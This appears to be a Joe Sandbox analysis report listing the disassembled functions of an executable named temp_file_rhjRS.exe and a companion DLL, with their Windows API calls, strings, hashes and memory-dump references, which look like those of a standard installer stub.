Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403164
GetTickCount.KERNEL32 ref: 004031E8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403211
wsprintfW.USER32 ref: 00403224

Strings

... %d%%, xrefs: 0040321E

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9

Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405D9E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040359C), ref: 00405DB9

Strings

"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" , xrefs: 00405D80
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89
nsa, xrefs: 00405D8D

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1851367361
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8

Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Function 0040612D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
RegCloseKey.KERNELBASE(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E

Strings

Call, xrefs: 00406134

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4

Function 00405844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
CloseHandle.KERNEL32(?), ref: 0040587A

Strings

Error launching installer, xrefs: 00405857

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(00000000), ref: 1000295B
GetLastError.KERNEL32 ref: 10002A62

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

Function 00406639 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
GetProcAddress.KERNEL32(00000000,?), ref: 00406666

Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
Part of subcall function 004065C9: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD

Function 00405D51 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 0040580F Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D

Function 00405DD4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403305,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405DE8

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8

Function 00405E03 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E17

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4

Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

